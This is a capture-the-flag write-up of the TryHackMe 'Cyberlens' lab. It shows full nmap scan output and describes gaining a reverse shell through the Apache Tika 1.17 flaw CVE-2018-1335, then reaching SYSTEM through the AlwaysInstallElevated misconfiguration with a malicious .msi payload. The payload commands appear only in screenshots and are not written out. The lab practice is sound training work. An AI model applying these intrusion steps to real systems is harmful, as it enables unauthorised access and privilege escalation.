Cyberlens - wook413

#tryhackme #windows #easy ![[Pasted image 20250716230908.png]] # Information Gathering - Nmap As always, I started off with TCP scan against all 65,535 ports. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p- Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-16 21:00 CDT Nmap scan report for 10.10.20.237 Host is up (0.13s latency). Not shown: 65518 closed tcp ports (reset) PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server 5985/tcp open wsman 7680/tcp open pando-pub 47001/tcp open winrm 49664/tcp open unknown 49665/tcp open unknown 49666/tcp open unknown 49667/tcp open unknown 49668/tcp open unknown 49669/tcp open unknown 49670/tcp open unknown 49676/tcp open unknown 61777/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 24.22 seconds ``` Then I performed one more TCP scan against open ports found for more detailed information. ```bash ──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sCV $IP -p 80,135,139,445,3389,5985,7680,47001,49664-49676,61777 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-16 21:02 CDT Nmap scan report for cyberlens.thm (10.10.20.237) Host is up (0.13s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.57 ((Win64)) |_http-server-header: Apache/2.4.57 (Win64) | http-methods: |_ Potentially risky methods: TRACE |_http-title: CyberLens: Unveiling the Hidden Matrix 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 3389/tcp open ms-wbt-server Microsoft Terminal Services |_ssl-date: 2025-07-17T02:03:37+00:00; -1s from scanner time. | rdp-ntlm-info: | Target_Name: CYBERLENS | NetBIOS_Domain_Name: CYBERLENS | NetBIOS_Computer_Name: CYBERLENS | DNS_Domain_Name: CyberLens | DNS_Computer_Name: CyberLens | Product_Version: 10.0.17763 |_ System_Time: 2025-07-17T02:03:29+00:00 | ssl-cert: Subject: commonName=CyberLens | Not valid before: 2025-07-16T01:58:45 |_Not valid after: 2026-01-15T01:58:45 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 7680/tcp open pando-pub? 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49670/tcp open msrpc Microsoft Windows RPC 49671/tcp closed unknown 49672/tcp closed unknown 49673/tcp closed unknown 49674/tcp closed unknown 49675/tcp closed unknown 49676/tcp open msrpc Microsoft Windows RPC 61777/tcp open http Jetty 8.y.z-SNAPSHOT |_http-server-header: Jetty(8.y.z-SNAPSHOT) |_http-title: Welcome to the Apache Tika 1.17 Server | http-methods: |_ Potentially risky methods: PUT |_http-cors: HEAD GET Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required | smb2-time: | date: 2025-07-17T02:03:29 |_ start_date: N/A |_clock-skew: mean: -1s, deviation: 0s, median: -1s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 66.37 seconds ``` Lastly, an UDP scan against top 10 ports ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sU $IP --min-rate 3000 --top-ports 10 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-16 21:05 CDT Nmap scan report for cyberlens.thm (10.10.20.237) Host is up (0.13s latency). PORT STATE SERVICE 53/udp closed domain 67/udp open|filtered dhcps 123/udp open|filtered ntp 135/udp open|filtered msrpc 137/udp open|filtered netbios-ns 138/udp open|filtered netbios-dgm 161/udp open|filtered snmp 445/udp open|filtered microsoft-ds 631/udp open|filtered ipp 1434/udp open|filtered ms-sql-m Nmap done: 1 IP address (1 host up) scanned in 1.51 seconds ``` --- # Enumeration ##### Port 80 - HTTP I opened my browser, typed in the IP address, and navigated to the website below. ![[Pasted image 20250716210854.png]] ##### Port 61777 - HTTP Then I navigated to the service on port 61777 and it revealed the name and version of the running server: `Apache Tika 1.17 Server` ![[Pasted image 20250716211945.png]] # Exploit - Initial Access `searchsploit` database shows us there's a known vulnerability for this version: `CVE-2018-1335` ![[Pasted image 20250716212101.png]] I executed the exploit code with correct arguments but nothing happened. I also tried tweaking arguments values but the result was the same. ![[Pasted image 20250716220201.png]] To confirm whether it's actually executing my commands, I set up `tcpdump` to listen for ICMP packets. I then had the target ping my own machine, and I was able to capture the ICMP requests. ![[Pasted image 20250716220922.png]] I saw the target pinged my machine, so command execution is definitely happening. Now, I would like to get a reverse shell. I used the powershell base64 encoded version..and I got in! ![[Pasted image 20250716221939.png]] Found `user.txt` in `C:\Users\CyberLens\Desktop` ![[Pasted image 20250716230643.png]] # Privilege Escalation I found `AlwaysInstallElevated` vulnerability in this machine. - In Windows, there's a policy setting that determines whether `.msi` files are executed with `user-level` or `SYSTEM-level` privileges. - If the policy is misconfigured, any user, even a low privileged one, can run `.msi` files with `SYSTEM` privileges. - Specifically, If `AlwaysInstallElevated` is set to 1 in both the `HKLM` (Local Machine) and `HKCU`(Current User) registry hives, the system is vulnerable. ![[Pasted image 20250716222910.png]] Let's make a malicious `.msi` payload in our local Kali machine and transfer it to this vulnerable Windows target system. ![[Pasted image 20250716230325.png]] The payload has been successfully transferred. ![[Pasted image 20250716230407.png]] I ran `revshell.msi` and received the reverse shell connection again in my local Kali via port 2222 but this time I'm `nt authority\system` :) ![[Pasted image 20250716230507.png]] Found `admin.txt` in `C:\Users\Administrator\Desktop` ![[Pasted image 20250716230544.png]]